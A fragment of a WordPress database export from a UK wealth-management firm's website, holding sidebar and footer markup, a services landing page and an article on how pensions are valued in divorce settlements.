href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/g-day-impact-gender-directive-insurance\">&#13;\n										<img width=\"52\" height=\"21\" src=\"/wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/g-day-impact-gender-directive-insurance\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/what-does-a-wealth-managerdo\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/what-does-a-wealth-managerdo\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/will-you-avoid-care-home-costs\">&#13;\n										<img width=\"52\" height=\"34\" src=\"/wp-content/uploads/2013/02/photodune-2677721-big-ben-s2-e1361782596271.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"goverment report on care home costs uk\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/will-you-avoid-care-home-costs\">Will You Avoid Care Home Costs?</a>&#13;\n									<div class=\"meta\">&#13;\n										February 23rd, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/what-does-a-wealth-managerdo\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/what-does-a-wealth-managerdo\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/7-pension-release-rules\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/7-pension-release-rules\">7 Pension Release Rules to consider – so YOU don’t lose out.</a>&#13;\n									<div class=\"meta\">&#13;\n										August 29th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/pension-liberation-good-plan-or-bad-scam\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/pension-liberation-good-plan-or-bad-scam\">Pension Liberation – Good plan or bad scam?</a>&#13;\n									<div class=\"meta\">&#13;\n										July 7th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/from-the-kitchen-table-to-the-wealth-management-marketplace-our-20-year-story\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/from-the-kitchen-table-to-the-wealth-management-marketplace-our-20-year-story\">From the Kitchen Table to the Wealth Management Marketplace – A 20 Year Story</a>&#13;\n									<div class=\"meta\">&#13;\n										July 2nd, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/retirement-income-the-final-frontier\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/retirement-income-the-final-frontier\">Retirement Income. The Final Frontier.</a>&#13;\n									<div class=\"meta\">&#13;\n										June 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (1)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (2)</option><option class=\"level-0\" value=\"4\">Pensions  (3)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"1\">Wealth Management  (4)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"/feed\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																					</ul></div></div>&#13;\n		</div>&#13;\n	</div>&#13;\n			<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"/what-does-a-wealth-managerdo\" title=\"What Does a Wealth Manager Do?\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/7-pension-release-rules\" title=\"7 Pension Release Rules to consider – so YOU don’t lose out.\">7 Pension Release Rules to consider – so YOU don’t lose out.</a>&#13;\n							<span class=\"post-date\">August 29, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/pension-liberation-good-plan-or-bad-scam\" title=\"Pension Liberation – Good plan or bad scam?\">Pension Liberation – Good plan or bad scam?</a>&#13;\n							<span class=\"post-date\">July 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/from-the-kitchen-table-to-the-wealth-management-marketplace-our-20-year-story\" title=\"From the Kitchen Table to the Wealth Management Marketplace – A 20 Year Story\">From the Kitchen Table to the Wealth Management Marketplace – A 20 Year Story</a>&#13;\n							<span class=\"post-date\">July 2, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/retirement-income-the-final-frontier\" title=\"Retirement Income. The Final Frontier.\">Retirement Income. The Final Frontier.</a>&#13;\n							<span class=\"post-date\">June 21, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">enquiries@equalitywalk.org.uk</a></p>&#13;\n		&#13;\n				&#13;\n				<div style=\"clear:both;\"/></div><div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\"><p>Connect With Us</p>		<ul class=\"social-networks clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"/feed\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																					</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n			<script><![CDATA[\r\njQuery(document).ready(function(){\r\n	jQuery(\".footer-nav a:last-child\").css(\'border-right\', \'none\');\r\n\r\n});\r\n]]></script><script type=\"text/javascript\"><![CDATA[\r\njQuery(document).ready(function(){\r\n	jQuery(\'.opl-widget-btn\').each(function(){\r\n		var $this = jQuery(this);\r\n		$this.click(function(e){\r\n			document.getElementById(\'opl-widget-submit\').submit();\r\n		});\r\n	});\r\n});\r\n]]></script><script><![CDATA[\r\n	jQuery(document).ready(function($){\r\n		var opl_topnav_w = $(\'#opl-top-nav\').outerWidth() + 20;\r\n		$(\'#opl-top-nav\').css({\r\n			\'width\' : opl_topnav_w + \'px\',\r\n		});\r\n	});\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-includes/js/jquery/ui/jquery.ui.datepicker.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-packed.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/imagesLoaded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.isotope.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.cycle.lite.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.hoverIntent.minified.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.eislideshow.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/froogaloop.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.placeholder.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.waypoint.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gauge.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.ddslick.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.infinitescroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main.js\"/></body>','Esmart Money','','publish','closed','closed','','esmart-money','','','2017-09-21 16:34:29','2017-09-21 16:34:29','',0,'http://www.equalitywalk.org.uk/esmart-money',0,'page','',0),(64,1,'2017-09-21 16:34:29','2017-09-21 16:34:29','<div id=\"textdiv\">\r\n\r\nWith so many different types of <a href=\"/investments\">savings &amp; investments</a> it’s wise to seek advice, we can offer advice on <a href=\"offshore-bonds\">offshore bonds</a>, <a href=\"isas\">ISA\'s</a> and much more...\r\nsavings &amp; investments &gt;&gt;\r\n\r\n</div>\r\n<div id=\"textdiv2\">\r\n\r\nAt Equity SMART we are experts in all areas of Pension Planning, including: <a href=\"/pensions/sipps\">SIPPs</a>, <a href=\"/pensions/pension-release\">Pension Release</a>, and of course <a href=\"/\">Personal Pension Planning</a>.\r\n\r\n<a href=\"/pension\">pensions</a> &gt;&gt;\r\n\r\n</div>\r\n\r\n<div id=\"textdiv2\">Find out more about <a href=\"/asset-protection\">Asset Protection Trusts,</a> <a href=\"/discretionary-trusts\">Discretionary Trusts</a>, <a href=\"/absolute-trust\">Absolute Trusts</a> and <a href=\"/wills-trust\">Wills</a> at Equity SMART.\r\n\r\nWe’ll make sure you get the right advice.\r\ntrusts &amp; protection &gt;&gt;\r\n\r\n</div>','Wealth Management - Financial Advice and Information','Equity SMART are experts in wealth management and financial advice.  Our highly experienced wealth managers provide you with specialist advice on managing your finances.','publish','closed','closed','','wealth-management-financial-advice-and-information','','','2017-09-21 16:56:33','2017-09-21 16:56:33','',0,'http://www.equalitywalk.org.uk/wealth-management-financial-advice-and-information',0,'page','',0),(65,1,'2018-12-18 16:34:30','2018-12-18 16:34:30','<img class=\"aligncenter size-full wp-image-359\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2018/12/divorce.jpg\" alt=\"Divorce settlements\" width=\"960\" height=\"640\" />\r\n\r\n<b>“Til Divorce Do Us Part”</b>\r\n\r\nIn February last year the Office for National Statistics released some depressing figures: The ONS estimates that 42% of marriages now end in divorce  34% of marriages are expected to end in divorce by the 20th wedding anniversary.\r\n\r\nThe greatest chance of divorce is between the 4th and 8th wedding anniversaries. In 2017 there were 127,588 divorces in England and Wales: the comparable figure for Scotland (from the Registrar General) was 9,814. See stats here.\r\n\r\nThe Scottish figure was the lowest for thirty years – so on the face of it the trend may be reversing. Sadly, that is almost certainly <i>not </i>the case. It is widely accepted that the recession means that many couples who wanted to divorce simply couldn’t afford it – in some cases couples are even having to continue living together after they’ve taken the decision to divorce. But with the economy now improving we will almost certainly see an upturn in the divorce statistics.\r\n\r\n<strong>No-one gets married with the intention of splitting up</strong> – but as the figures show, all too often a marriage ends with the couple going their separate ways. If the divorce happens at a relatively young age and there are <em>no children involved then it can be a simple process</em>. If that’s the case with you, <a href=\"https://www.theguardian.com/lifeandstyle/2016/aug/23/divorce-new-rules-splitting-up-amicable-marriage-breakup\" target=\"_blank\">this website could be useful</a>.\r\n\r\nHowever, the longer a couple have been together the more complicated divorce proceedings are likely to be – <em>and the more there will be a need for financial planning advice.</em>\r\n<h2>Can Pensions Be Affected?</h2>\r\nThis is particularly true once pensions are brought into the divorce proceedings – and this trend will only increase with the Government’s drive to make sure that everyone is ultimately enrolled in a workplace pension.\r\n\r\n<strong>The value of a pension</strong> – especially if someone is in a public sector pension scheme – can run into hundreds of thousands of pounds and it can outstrip the value of the family home as the main asset a couple own.\r\n\r\nIn our experience it is still the case the pensions are all too often not valued properly in divorce proceedings, leading to one of the couple – and it is invariably the wife – being ‘short-changed.’\r\n\r\nThe financial calculations involved in divorce proceedings are being further complicated by increasing life expectancy. <em>Getting divorced can be the saddest and frustrating part of your life. <a href=\"http://www.mentalhealthamerica.net/separation-and-divorce\" target=\"_blank\">See coping advice</a>.\r\n</em>\r\n\r\nNo one ever gets married and has the expectation to later on get divorced, so of course it is a time where both will go <strong>through a long process of frustration</strong>.\r\n\r\nSigning papers and documents can be time consuming and so are the other problems that come with it, such as <strong>child custody and finance settlements</strong>. You will find these times to be very critical and having lawyers that know what they are doing can be a <em>great help as they are able to provide guidance</em>. If you are experiencing these difficulties, we recommend using <a href=\"https://emfl.com.au/property-settlements/\" target=\"_blank\">Emerson Family Law to handle your property settlements</a> and other assets.\r\n<h2>Understanding  your rights</h2>\r\nWe have some serious doubts regarding these tables, and yet they are still being relied on in many of the divorce cases that we see – often to the significant disadvantage of the wife.\r\n\r\nFinancial planning associated with divorce is not going to become any easier – and it’s one of those areas where you need to take action sooner rather than later. And yet it’s difficult – there’s an understandable reluctance to get involved in the minutiae of pensions planning.\r\n\r\nAt Equity SMART we understand how difficult a divorce can be. That’s why we give efficient, professional, easy-to-understand advice: we’ll take care of the financial side of the divorce, leaving you free to rebuild your life and look after your family. <em>You’ve enough to worry about, without worrying about money.</em>\r\n\r\n<strong>If you feel that you may be heading towards a divorce</strong> – or your clients tell you that they may be – then please don’t hesitate to get in touch with us. We’re happy to listen, and to help.\r\n<p class=\"form-submit\"><input id=\"comment_post_ID\" name=\"comment_post_ID\" type=\"hidden\" value=\"8091\" /></p>\r\n\r\n<div id=\"sidebar\" style=\"display: none;\">\r\n<div id=\"text-24\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big></center>people who get our best financial wisdom on a weekly basis.\r\n<a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" target=\"_blank\"><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"recent_works-widget-2\" class=\"widget recent_works\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"heading\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>New Guides</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"recent-works-items clearfix\">&#13;\r\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\r\n					</a>&#13;\r\n				